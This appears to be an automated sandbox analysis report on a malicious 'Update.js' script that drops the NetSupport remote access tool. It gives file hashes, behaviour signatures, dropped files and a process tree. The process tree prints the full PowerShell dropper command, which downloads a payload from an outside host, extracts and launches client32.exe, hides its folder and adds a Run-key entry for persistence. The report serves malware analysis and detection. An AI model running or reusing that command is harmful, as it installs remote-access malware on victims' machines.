Overview

overview

10

Static

static

1

Update.js

windows7-x64

8

Update.js

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-08-2024 17:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Update.js

  • Size

    3.9MB

  • MD5

    a258d4bc0d68fd1bd8eca1a04f204caa

  • SHA1

    a287d8e69d87b0134405a64e4293d08a20fa1973

  • SHA256

    76f6ad7ac251a4529341f28fc1aa4dc0ee2836caccdcf146816dab5040697884

  • SHA512

    6fee6c9ef2cd8151fc8cd79e049041bc9ebe031ee72cd05f150c54fba21f9b93f7692746f6bd18868314c065ecc77d694034ab351ccd171017ab0209f15a473a

  • SSDEEP

    49152:6sz6FvpOiHY7sz6FvpOiHYXsz6FvpOiHY7sz6FvpOiHYEsz6FvpOiHY7sz6FvpOQ:60WQ0Ws0WQ0Wd0WQ0W5

Score
10/10
netsupportdiscoveryexecutionpersistencerat

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://utvj.com/cdn-vs/data.php?8404
exe.dropper

http://utvj.com/cdn-vs/data.php?8404

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Update.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AIFTCTV='http://utvj.com/cdn-vs/data.php?8404';$CWDA=(New-Object System.Net.WebClient).DownloadString($AIFTCTV);$ZIKF=[System.Convert]::FromBase64String($CWDA);$asd = Get-Random -Minimum -10 -Maximum 17; $NSLCAHFIZST=[System.Environment]::GetFolderPath('ApplicationData')+'\MDHYPSUAI'+$asd;if (!(Test-Path $NSLCAHFIZST -PathType Container)) { New-Item -Path $NSLCAHFIZST -ItemType Directory };$p=Join-Path $NSLCAHFIZST 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$ZIKF);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$NSLCAHFIZST)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $NSLCAHFIZST 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $NSLCAHFIZST -Force; $fd.attributes='Hidden';$s=$NSLCAHFIZST+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='VZGDWET';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3292
      • C:\Users\Admin\AppData\Roaming\MDHYPSUAI-2\client32.exe
        "C:\Users\Admin\AppData\Roaming\MDHYPSUAI-2\client32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2928

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v0vkfum4.3up.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\MDHYPSUAI-2\HTCTL32.DLL
    Filesize

    320KB

    MD5

    c94005d2dcd2a54e40510344e0bb9435

    SHA1

    55b4a1620c5d0113811242c20bd9870a1e31d542

    SHA256

    3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

    SHA512

    2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\MDHYPSUAI-2\MSVCR100.dll
    Filesize

    755KB

    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

    Download Submit

  • C:\Users\Admin\AppData\Roaming\MDHYPSUAI-2\NSM.LIC
    Filesize

    195B

    MD5

    e9609072de9c29dc1963be208948ba44

    SHA1

    03bbe27d0d1ba651ff43363587d3d6d2e170060f

    SHA256

    dc6a52ad6d637eb407cc060e98dfeedcca1167e7f62688fb1c18580dd1d05747

    SHA512

    f0e26aa63b0c7f1b31074b9d6eef88d0cfbc467f86b12205cb539a45b0352e77ce2f99f29baeab58960a197714e72289744143ba17975699d058fe75d978dfd0

    Download Submit

  • C:\Users\Admin\AppData\Roaming\MDHYPSUAI-2\PCICHEK.DLL
    Filesize

    18KB

    MD5

    104b30fef04433a2d2fd1d5f99f179fe

    SHA1

    ecb08e224a2f2772d1e53675bedc4b2c50485a41

    SHA256

    956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

    SHA512

    5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\MDHYPSUAI-2\PCICL32.DLL
    Filesize

    3.6MB

    MD5

    d3d39180e85700f72aaae25e40c125ff

    SHA1

    f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

    SHA256

    38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

    SHA512

    471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\MDHYPSUAI-2\client32.exe
    Filesize

    101KB

    MD5

    c4f1b50e3111d29774f7525039ff7086

    SHA1

    57539c95cba0986ec8df0fcdea433e7c71b724c6

    SHA256

    18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

    SHA512

    005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

    Download Submit

  • C:\Users\Admin\AppData\Roaming\MDHYPSUAI-2\client32.ini
    Filesize

    668B

    MD5

    a7d077a1aa3244f7251c1f0ffe6b875f

    SHA1

    b32ba9dcab9d5108b1b887e7dcea339b7e5467d4

    SHA256

    0eb705d2d4fabb4350c7c3bfd097ee2ad74db89283b7b6bd35a6c89bfaee7eb3

    SHA512

    c4e6a7142a7cc29e188e791ad3834037f029c717bb58942dda592732791d9ea056e84d27bf6a73d39e7c4ed98128236545b070d835208d75c83ebad149ecb4b8

    Download Submit

  • C:\Users\Admin\AppData\Roaming\MDHYPSUAI-2\pcicapi.dll
    Filesize

    32KB

    MD5

    34dfb87e4200d852d1fb45dc48f93cfc

    SHA1

    35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

    SHA256

    2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

    SHA512

    f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

    Download Submit

  • memory/3292-15-0x000001E2B4100000-0x000001E2B4112000-memory.dmp

    Filesize

    72KB

    Download

  • memory/3292-0-0x00007FFACC543000-0x00007FFACC545000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3292-14-0x000001E2B40D0000-0x000001E2B40DA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3292-88-0x00007FFACC540000-0x00007FFACD001000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3292-11-0x00007FFACC540000-0x00007FFACD001000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3292-12-0x00007FFACC540000-0x00007FFACD001000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3292-1-0x000001E2B3F60000-0x000001E2B3F82000-memory.dmp

    Filesize

    136KB

    Download